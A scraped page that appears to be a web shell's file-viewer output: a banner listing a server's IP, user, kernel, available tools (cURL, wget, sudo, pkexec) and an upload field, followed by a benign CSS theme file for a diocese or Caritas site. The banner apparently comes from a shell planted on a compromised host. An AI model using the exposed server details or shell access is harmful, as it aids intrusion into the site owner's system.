| Server IP : 119.195.102.159 / Your IP : 216.73.217.134 Web Server : nginx/1.18.0 System : Linux picell 5.15.0-181-generic #191-Ubuntu SMP Fri May 22 19:09:02 UTC 2026 x86_64 User : altablue ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/altablue/ |
Upload File : |
:root {
/* Brand Colors (Catholic Busan Style - Diocese) */
--color-primary: #1E3A8A;
/* Deep Blue */
--color-primary-light: #3B82F6;
--color-primary-dark: #1E3A5F;
--color-accent: #EAB308;
/* Gold/Yellow for warming */
/* Brand Colors (Caritas) */
--color-caritas: #E11D48;
/* Red */
--color-caritas-light: #F43F5E;
--color-caritas-dark: #BE123C;
/* Neutrals */
--color-bg: #F8FAFC;
--color-white: #FFFFFF;
--color-text: #1E293B;
--color-text-light: #64748B;
--color-border: #E2E8F0;
/* Gradients */
--gradient-primary: linear-gradient(135deg, #1E3A8A 0%, #1D4ED8 100%);
--gradient-caritas: linear-gradient(135deg, #E11D48 0%, #BE123C 100%);
--gradient-warm: linear-gradient(135deg, #1E3A8A 0%, #3B82F6 100%);
--gradient-overlay: linear-gradient(180deg, rgba(15, 23, 42, 0.4) 0%, rgba(15, 23, 42, 0.8) 100%);
/* Shadows */
--shadow-sm: 0 2px 4px rgba(0, 0, 0, 0.05);
--shadow-md: 0 4px 12px rgba(0, 0, 0, 0.08);
--shadow-lg: 0 8px 24px rgba(0, 0, 0, 0.12);
--shadow-xl: 0 16px 48px rgba(0, 0, 0, 0.16);
/* Radius */
--radius-sm: 8px;
--radius-md: 12px;
--radius-lg: 20px;
--radius-xl: 32px;
/* Spacing */
--spacing-xs: 8px;
--spacing-sm: 16px;
--spacing-md: 24px;
--spacing-lg: 40px;
--spacing-xl: 64px;
--spacing-2xl: 96px;
/* Typography */
--font-heading: 'Noto Sans KR', sans-serif;
--font-body: 'Noto Sans KR', sans-serif;
/* Transitions */
--transition-fast: 0.2s ease;
--transition-base: 0.3s cubic-bezier(0.4, 0, 0.2, 1);
--transition-slow: 0.5s cubic-bezier(0.4, 0, 0.2, 1);
/* Z-index */
--z-dropdown: 1000;
--z-header: 1100;
--z-modal: 1200;
}